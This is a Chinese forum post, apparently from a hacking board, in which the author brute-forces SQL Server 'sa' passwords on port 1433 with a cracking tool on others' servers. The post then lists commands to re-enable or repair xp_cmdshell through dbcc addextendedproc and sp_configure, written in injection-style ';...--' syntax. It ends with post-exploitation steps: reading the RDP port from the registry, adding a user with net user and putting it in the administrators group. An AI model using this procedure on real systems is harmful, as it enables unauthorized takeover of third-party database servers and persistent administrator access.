前段时间我朋友给我一个sopo的软件,说是扫1433口令的,而且猜解速度很快,我就找个服务器试了试,确实不错能扫到一些比较强点的口令。所以这段时间就玩了一下1433错误的恢复和提权。(有人可能会说了,这有啥好研究的,sa的权限直接加用户到超管不就成了吗。其实在sa权限下还是有很多的问题的大家可以捡有用的看没用的就略过吧)
下面来说sa下执行命令错误的几种情况:
1、无法装载DLLxpsql70.dll或该DLL所引用的某一DLL。原因126(找不到指定模块。)
这种情况比较常见的,修复起来说简单也简单,但是有条件的。这种情况要是能列出目录(用sqltoolsv2.0就有列目录功能)恭喜你这个有80%的情况能修复了,如果能列目录,那么只要找到xplog70.dll的路径执行以下命令就可以了。
第一步
execsp_dropextendedproc'xp_cmdshell'(这个命令就是删除原有的cmdshell,因为已经出错了)
第二步
dbccaddextendedproc(“xp_cmdshell”,“c:\ProgramFiles\MicrosoftSQLServer\MSSQL\Binn\xplog70.dll”)
;EXECsp_configure'showadvancedoptions',0–
当然这是sql命令,用查询分析器执行。第二步里的c:\ProgramFiles\MicrosoftSQLServer\MSSQL\Binn\xplog70.dll就是xplog70.dll的路径,这个路径是比较常见的,如果c盘没有可以找找其他盘符。
2、无法在库xpweb70.dll中找到函数xp_cmdshell。原因:127(找不到指定的程序。)
其实这个跟上面的126是一样的就是cmdshell出错了只要找到备份的xplog70.dll按照上面的方法就能修复了。
3、未能找到存储过程‘masterxpcmdshell'
这种情况我看到网上的方法是:
第一步先删除:
dropproceduresp_addextendedproc
dropproceduresp_oacreate
execsp_dropextendedproc'xp_cmdshell'
第二步恢复:
dbccaddextendedproc(“sp_oacreate”,“odsole70.dll”)
dbccaddextendedproc(“xp_cmdshell”,“xplog70.dll”)
其实这个跟上面的还是一样,其实如果细心的话,上面的126127只执行第一步的时候就会出现未能找到存储过程'masterxpcmdshell'因为第一步就是删除cmdshell的存储过程。所以这种情况下只执行上面的第二个步骤就可以了。
4.ErrorMessage:SQLServer阻止了对组件'xp_cmdshell'的过程'sys.xp_cmdshell'的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用sp_configure启用'xp_cmdshell’。有关启用'xp_cmdshell'的详细信息,请参阅SQLServer联机丛书中的“外围应用配置器”。
这种情况是最简单的了,因为什么都不用考虑,直接执行以下命令就可以了
;EXECsp_configure'showadvancedoptions',1--
;RECONFIGUREWITHOVERRIDE--
;EXECsp_configure'xp_cmdshell',1--
;RECONFIGUREWITHOVERRIDE--
;EXECsp_configure'showadvancedoptions',0–
经过上面的修复能够执行cmd命令了,下面就要开始提权了。我一般都是ipconfig先查下ip看看是不是内网,然后REGqueryHKLM\SYSTEM\CurrentControlSet\Control\Terminal“”Server\WinStations\RDP-Tcp/vPortNumber查看一下终端端口,再netstat–an看看终端是否打开然后netuser用户密码/add加个用户再netlocalgroupadministrators用户/add一切顺利的话,这就拿下一个服务器了。但是在这个过程中还会遇到很多问题。
* |
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡